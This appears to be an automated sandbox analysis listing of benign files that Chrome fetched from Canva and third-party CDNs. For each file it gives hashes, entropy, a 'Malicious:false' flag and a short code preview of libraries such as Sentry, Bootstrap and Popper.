                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7045],{../***/ 277425:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var lPa,mPa;lPa=function(){var a=window;a.addEventListener("dragstart",b=>{null!=b.target&&(b.target instanceof a.HTMLElement&&!1===b.target.draggable||b.target instanceof a.SVGElement)&&(b.preventDefault(),b.stopPropagation())},!0)};mPa=function(a){return a.charAt(0).toUpperCase()+a.slice(1)+"Service"};__c.tz=class extends __c.ae{constructor(a={}){super({...a,statusCode:403});this.name="HttpForbiddenError";Object.setPrototypeOf(this,__c.tz.prototype)}};.__c.uz=class extends __c.ae{constructor(a={}){super({...a,statusCode:404});this.name="HttpNotFoundError";Object.setPrototypeOf(this,__c.uz.prototype)}};__c.vz=class extends __c.ae{constructor
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (582)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):641
                                                                                                                                                                                                                                                                    Entropy (8bit):4.9079451292395095
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:m1l1fX1sHcXd+1NOH44KHYP4Ax5lWcx4uiGo45V4MtizGK1V4+BW44c/ac4GHzVG:yrdmcXd6NOH44KHy4AtWcx4Wo45V42iK
                                                                                                                                                                                                                                                                    MD5:07254CD7D8E452943780B1BAE736704B
                                                                                                                                                                                                                                                                    SHA1:15EE35ACEFDCBBC36C54A9FD5579E5CBB06546C9
                                                                                                                                                                                                                                                                    SHA-256:376633F276260A114D586216911005AF76A989E3FF049D3641302D7211CA6E4A
                                                                                                                                                                                                                                                                    SHA-512:C3D47BDAA9A09003CEBAFD689FF88EF7B3A35A3DED0F043686D75C4E21F86CC43C9A023B4B1B56AC028741C8771DDAA44123490CFADF0C6A31A7116FB42078D8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:window['cmsg']['assets'] = window['cmsg']['assets'] || {};.window['cmsg']['assets']["en"] = Object.assign(window['cmsg']['assets']["en"] || {}, {"158":{"js":["9f45295e288f7b33.strings.js"],"css":[]},"1008":{"js":["353a3cba55bfa046.strings.js"],"css":[]},"2063":{"js":["ddc3ba95d26179c9.strings.js"],"css":[]},"4085":{"js":["fe0857dd958df633.strings.js"],"css":[]},"4436":{"js":["73112b4e8057cf9b.strings.js"],"css":[]},"6037":{"js":["dad3364637d681fb.strings.js"],"css":[]},"7157":{"js":["e0c33afc52136d6f.strings.js"],"css":[]},"8212":{"js":["80e59963e6d576e3.strings.js"],"css":[]},"8854":{"js":["bebb780dc550bde0.strings.js"],"css":[]}});
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):6785
                                                                                                                                                                                                                                                                    Entropy (8bit):4.764532758184024
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:4rPKbcyONPj2Ix4JA63seKKpJ4zde/rsVJgqecW2RYz2nS6ef/kqy:4rPSchJ2Y4JhserpGZEVqecW2RRS6e0b
                                                                                                                                                                                                                                                                    MD5:9C747CF07B2623FE6F77E47F5A134103
                                                                                                                                                                                                                                                                    SHA1:7180E5B53413163E10A6CA1E94518AC2CEB7970A
                                                                                                                                                                                                                                                                    SHA-256:476CDA2BDE7910A58186B7B58D2BE6D22D3CFACDFEDA3354134B84E43D76AC98
                                                                                                                                                                                                                                                                    SHA-512:4C1894FD984FC35FBC725737F68B69982B4E53864EB8BF1B8A5826D4D62C682AD4D50C08BA4EAEE3FBE04D3B91EA22A79559AA77BE6BCF3B81025348C8CEB35A
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://cdn.metadata.io/site-insights.js
                                                                                                                                                                                                                                                                    Preview:(function () {. /**. * @type {string} Key for the visitor ID cookie.. */. const visitorIdKey = "Metadata_visitor_id";.. /**. * @type {string} Key for the session ID cookie.. */. const sessionIdKey = "Metadata_session_id";.. /**. * @type {string} IP address of the client.. */. let ip;.. /**. * Account configuration object.. */. const config = {. invalid: true. };.. /**. * Options object.. */. const opts = {. /**. * @type {string} Base URL for the CDN.. */. cdnBaseUrl: "https://cdn.metadata.io/pixel/config",.. /**. * @type {string} Base URL for the API.. */. baseUrl: "https://api-gw.metadata.io",.. /**. * @type {string} Account ID.. */. accountId: null. };.. /**. * Get the value of a cookie.. * @param {string} key - The key of the cookie.. * @returns {string|null} The value of the cookie, or null if not found.. */. const getCookieValue = (key) => {. const cookie = document.cookie.split("; ").find(fu
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55289)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):55418
                                                                                                                                                                                                                                                                    Entropy (8bit):5.2011745666689
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:7Snb/BBuuGki0usgH8bdwB005NLqrbcSb4sA7CctFzBmBv4L7HelSWVoz8WlqdLZ:70q8berM2bW6X49yWx1ZSDh/33s
                                                                                                                                                                                                                                                                    MD5:16E5D529039D25735AE0BA1D610125E8
                                                                                                                                                                                                                                                                    SHA1:D7CAA746424A018583EC1E097F74A484C4FB1811
                                                                                                                                                                                                                                                                    SHA-256:C6DE703F8EE214808496DCD92795AC8971782935ED75ABDD5624C814E69DAAEA
                                                                                                                                                                                                                                                                    SHA-512:56AC6CDABC05070E1440C8CA4A60119B3555B2743BA8652A2A0282701ECC8E150AC343020D620D3F5CD6406F04966CDE54FD797530149AD0B2711E44F89165D0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(t,n,e){const r
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2099)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):19427
                                                                                                                                                                                                                                                                    Entropy (8bit):5.434887920035635
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:rmDEIbLcM66D7Z8n6+cjZKRg0j303O8PyP4xgkVKd3XU+i0K6GP5hG4wNMjmPHTp:rmDEIbLcPGqRgw303O8PyP4xvKd3XU+N
                                                                                                                                                                                                                                                                    MD5:074762FFEBF691A335250ED795F0BD76
                                                                                                                                                                                                                                                                    SHA1:5B8293FD60D2201481ADB24424E9FDB5B61579E9
                                                                                                                                                                                                                                                                    SHA-256:557A6988F6C7641A1605DF33C1195DC72C3A04CB5913424C992339221488279D
                                                                                                                                                                                                                                                                    SHA-512:C4BB0A29214B65796333A4C432C85B13F8DA6F6878B7325E74BD45411E194D34E29FA7A6F00BC12D69AE4C88E57B070BF7BFE8C2864CD43D098410CCC6196B49
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:5756a030498f80f0.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6305],{../***/ 790697:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(353279);__web_req__(323028);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var XMc=function(a,b){b&&__webpack_require__.me(890961).then(c=>{const d=new VMc(a.xp,b,c);WMc(()=>a.xp,e=>d.Qr(e));d.start();return d})},YMc=async function(a){a.Hl=await __webpack_require__.me(890961)},$Mc=async function(a,b,c){await ZMc(a,b,c);a.i8(b)},ZMc=async function(a,b,c){if(null!=c&&c===a.bootstrap.userId)try{"function"===typeof a.Bd&&(a.Bd=await a.Bd());const d=await a.Bd.Ota(new aNc({userId:c}));d.Vha||(b.BG=d.hh.BG)}catch(d){a.G.info(d instanceof Error?d:`Unknown error ${d}`,"Could not fetch privacy preferences")}},.bNc=__c.M(()=>[1,2,3,4,5,6]),cN
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (19185)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):19628
                                                                                                                                                                                                                                                                    Entropy (8bit):5.199142346488417
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:0Ot5jB1rzOt2wXIAhGovwZnAKvmqJALIBXgK8qp218qrNnoEnuIh1XxfeYqtAqY8:r5PaBvoXeLawz1DZqwZQ
                                                                                                                                                                                                                                                                    MD5:C261587FC6DA6C6FCD58CC2A945BA8A4
                                                                                                                                                                                                                                                                    SHA1:3B16BBE9473A14CD390F15865B4B71C83F4F5214
                                                                                                                                                                                                                                                                    SHA-256:A99C949A0A535277464B54A138F84E56005B35C877C2EEBAB4B13A85130034EF
                                                                                                                                                                                                                                                                    SHA-512:E170835C1B73ECF68B13CC78DE98A70C9B772BED166D1A18CE04BBDC0176B5EFCFAF0CB77A4DE556BCBD9DF2B5BC81DFAD776B43994048D951E1FCDB26168376
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/1c5520ae304c8de4.strings.js
                                                                                                                                                                                                                                                                    Preview:(function() {. const messages = JSON.parse("{\"eq4PgA\":\"Didn.t get the code? Resend code\",\"in7gzw\":\".{0} . {1}\",\"BQkOCQ\":\"{0}K\",\"iGADsg\":\"Skip to search\",\"mYD1Jg\":\"Confirm\",\"PFOUew\":\"Continue\",\"FvYu7Q\":\"This password is common and easy to guess.\",\"08inLQ\":\"Page {0}\",\"m0Q+yA\":\"You.re invited to edit a design created by {0}, start designing now\",\"/JYvRA\":\"Set password\",\"iTruLw\":\"Strong\",\"Gm1Hxg\":\"Too weak\",\"tkkB/A\":\"Names and surnames are easily guessed.\",\"DiRXIw\":\"June\",\"XS/GBQ\":\"Untitled\",\"GQHbPg\":\"Reset your password\",\"bSA5qA\":\"To protect your privacy we can.t allow you to create a Canva account yourself.\",\"LE4MeQ\":\"Esc\",\"UY/ePA\":\"{0}M\",\"q4OW6A\":\"Your birthday can.t be in the future\",\"eKXiSQ\":\"Password\",\"/fLNHg\":\"When you set up two factor authentication we gave you some backup codes. You can use one of them here to regain access to your account.\",\"yAXvfg\":\"Create your own design with
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://sb.scorecardresearch.com/p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551
                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):470
                                                                                                                                                                                                                                                                    Entropy (8bit):4.428280927846403
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:t41WffQa0L0Nn7Ke+FuMXc7w0mHm1dNB2d4b:t414fzy0tsFjc7awdadg
                                                                                                                                                                                                                                                                    MD5:E5C5A4D109AEB5234E4405032DFD4800
                                                                                                                                                                                                                                                                    SHA1:4208CA1C20A9914F396350866B5DB5BB3A851B77
                                                                                                                                                                                                                                                                    SHA-256:0E19C6400D8E588E305CC6B80195926FEB73BD09F05732AAC6CCE1483A509A75
                                                                                                                                                                                                                                                                    SHA-512:D238FFD9149EE1EF975BA39C7B7AA70CD255B10A2B68E4C1DC8BA29484E18C1925B86A8DD11969B648EA6322E474EDE5CC5792A76456D83E04B8C1DE82B810AD
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFAC33" d="M27.287 34.627c-.404 0-.806-.124-1.152-.371L18 28.422l-8.135 5.834a1.97 1.97 0 0 1-2.312-.008 1.971 1.971 0 0 1-.721-2.194l3.034-9.792-8.062-5.681a1.98 1.98 0 0 1-.708-2.203 1.978 1.978 0 0 1 1.866-1.363L12.947 13l3.179-9.549a1.976 1.976 0 0 1 3.749 0L23 13l10.036.015a1.975 1.975 0 0 1 1.159 3.566l-8.062 5.681 3.034 9.792a1.97 1.97 0 0 1-.72 2.194 1.957 1.957 0 0 1-1.16.379z"/></svg>
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):19188
                                                                                                                                                                                                                                                                    Entropy (8bit):5.212814407014048
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                                                                                                                                    MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                                                                                                                    SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                                                                                                                    SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                                                                                                                    SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48664)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):48944
                                                                                                                                                                                                                                                                    Entropy (8bit):5.272507874206726
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                                                                                                                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                                                                                                                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                                                                                                                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                                                                                                                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                                                                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):115121
                                                                                                                                                                                                                                                                    Entropy (8bit):5.371362815606401
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:tX/OXPeGcbWUc/0aHscJYoJyhVVh5XGsj56pY5TS2z5frSiqdE:tX/sPbcbWUXaHscGoIhVVHXGqSK5frf/
                                                                                                                                                                                                                                                                    MD5:CB1826AF86C8190CEB1FF4F70E255C6D
                                                                                                                                                                                                                                                                    SHA1:83057F32ACAA0D277001D22AEAEC60D141281C3E
                                                                                                                                                                                                                                                                    SHA-256:34E60C5656534222F02FC99959F0B48D191CE8A6CF8CC78DCFDA19A794FAED9F
                                                                                                                                                                                                                                                                    SHA-512:BA5F119FD4C74B74E310A3EB6451B117F564634208B9D20259D554A3D8749E17ACC39D3DBD2B82DEC7426ADFE4ED61EA24919B9ECEB6EF06BF837491A180D9DB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/f0398d1166314304.vendor.js
                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.length);for(let n=0;n<i.length;++n)s[n]=i.charCodeAt(n);return s}}},576196:(t,e,i)=>{i.d(e,{G:()=>s});const s={CustomEvent:"ce",Pr:"p",_u:"pc",vc:"ca",Ea:"i",qs:"ie",M:"cci",R:"ccic",I:"ccc",F:"ccd",ql:"ss",xl:"se",Oi:"si",Ei:"sc",Gi:"sbc",Cc:"sfe",mo:"iec",Uu:"lr",zu:"uae",O:"ci",$:"cc",Ju:"lcaa",Eu:"lcar",On:"inc",Ln:"add",Rn:"rem",$n:"set",Bn:"ncam",Ku:"sgu",Fr:"ffi"}},876055:(t,e,i)=>{i.d(e,{Z:()=>s});const s={W:function(){const t=(t=!1)=>{const e=(Math.random().toString(16)+"000000000").substr(2,8);return t?"-"+e.substr(0,4)+"-"+e.substr(4,4):e};return t()+t(!0)+t(!0)+t()}}},19601:(t,e,i)=>{i.d(e,{Z:()=>s});class s{constructor(t,e){this.database=t,this.vd=e,this.parent="undefined"==typeof window?self:window,this.database=t,this.vd=
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2881)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):219912
                                                                                                                                                                                                                                                                    Entropy (8bit):5.723303311793263
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:F+38a9esABybAfPp0aaUKhxyegrGgWwzqyPqw03OLf+r68vsVjzb2WZh9CRD9Q8x:F+38a9esABi/cWwzqyPqw03OLf+tvsVk
                                                                                                                                                                                                                                                                    MD5:B8024E96A21BE90DB7DDA2E9AAB1B1C3
                                                                                                                                                                                                                                                                    SHA1:F1A41AFCFEB0C12309EDCF8F734026EF030AB26A
                                                                                                                                                                                                                                                                    SHA-256:7626ED74B0A704BAE367DD944093322583959A0F58214F5ADAB3774E6C4FA84B
                                                                                                                                                                                                                                                                    SHA-512:CB40AFA3EE0D13504CF3782DBFDD3E4375E17FEEBE6A2A9171D87D3B7BC813BDBA6604C9C485E420E00A7756F3A792086A8D0D8E60B78FB4F27BDDA0AF8DC5FF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:3e1e05ba24ee6f70.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9976],{../***/ 376699:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(79194);__web_req__(912002);__web_req__(68864);__web_req__(46127);__web_req__(121446);__web_req__(772112);__web_req__(17726);__web_req__(139504);__web_req__(224868);__web_req__(629056);__web_req__(131660);__web_req__(694173);__web_req__(923631);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var rb=__c.rb;var Bb=__c.Bb;var ww=__c.ww;var di=__c.di;var P=__c.P;var GB=__c.GB;var CB=__c.CB;var A=__c.A;var yB=__c.yB;var B=__c.B;var O=__c.O;.var jYc=function(a){switch(a){case 4:return O("9ND0kg");case 2:return O("ibdecg");case 7:return O("446quA");case 5:return O("j1fbqg");case 1:return O("O5i4AQ");case 6:return O("C0VHsg");case 3:return O(
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):470
                                                                                                                                                                                                                                                                    Entropy (8bit):4.428280927846403
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:t41WffQa0L0Nn7Ke+FuMXc7w0mHm1dNB2d4b:t414fzy0tsFjc7awdadg
                                                                                                                                                                                                                                                                    MD5:E5C5A4D109AEB5234E4405032DFD4800
                                                                                                                                                                                                                                                                    SHA1:4208CA1C20A9914F396350866B5DB5BB3A851B77
                                                                                                                                                                                                                                                                    SHA-256:0E19C6400D8E588E305CC6B80195926FEB73BD09F05732AAC6CCE1483A509A75
                                                                                                                                                                                                                                                                    SHA-512:D238FFD9149EE1EF975BA39C7B7AA70CD255B10A2B68E4C1DC8BA29484E18C1925B86A8DD11969B648EA6322E474EDE5CC5792A76456D83E04B8C1DE82B810AD
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/e5c5a4d109aeb5234e4405032dfd4800.svg
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFAC33" d="M27.287 34.627c-.404 0-.806-.124-1.152-.371L18 28.422l-8.135 5.834a1.97 1.97 0 0 1-2.312-.008 1.971 1.971 0 0 1-.721-2.194l3.034-9.792-8.062-5.681a1.98 1.98 0 0 1-.708-2.203 1.978 1.978 0 0 1 1.866-1.363L12.947 13l3.179-9.549a1.976 1.976 0 0 1 3.749 0L23 13l10.036.015a1.975 1.975 0 0 1 1.159 3.566l-8.062 5.681 3.034 9.792a1.97 1.97 0 0 1-.72 2.194 1.957 1.957 0 0 1-1.16.379z"/></svg>
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1290)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):5961
                                                                                                                                                                                                                                                                    Entropy (8bit):5.491959404530541
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:wJ2jDtlG+FqvyIp+t8XP49gl79eXvmknxN95+VEyLg8/mU+0drGWm4LJI9k:S2jDr9qvyIpQ2TZ6v7nxN95YleRsrGwR
                                                                                                                                                                                                                                                                    MD5:2011B7A377F83AE563A227EFE5DE3A62
                                                                                                                                                                                                                                                                    SHA1:119A71B0AECFEBE84D38C759C44A94622B01ACD3
                                                                                                                                                                                                                                                                    SHA-256:35CBC332D69E43BEDF9D8CD040F8DC90A2F34B5B3065FC30CE0E33D7F92F83A4
                                                                                                                                                                                                                                                                    SHA-512:69529FA083CFD7F3C05FC11EC78E0419C7B7317A7F823768FCA352340C8192D197DE27892B9E53287DDAA6A1C003F153559EA213394F20D895EA9B7671319F6C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/3eff736f43ef8805.js
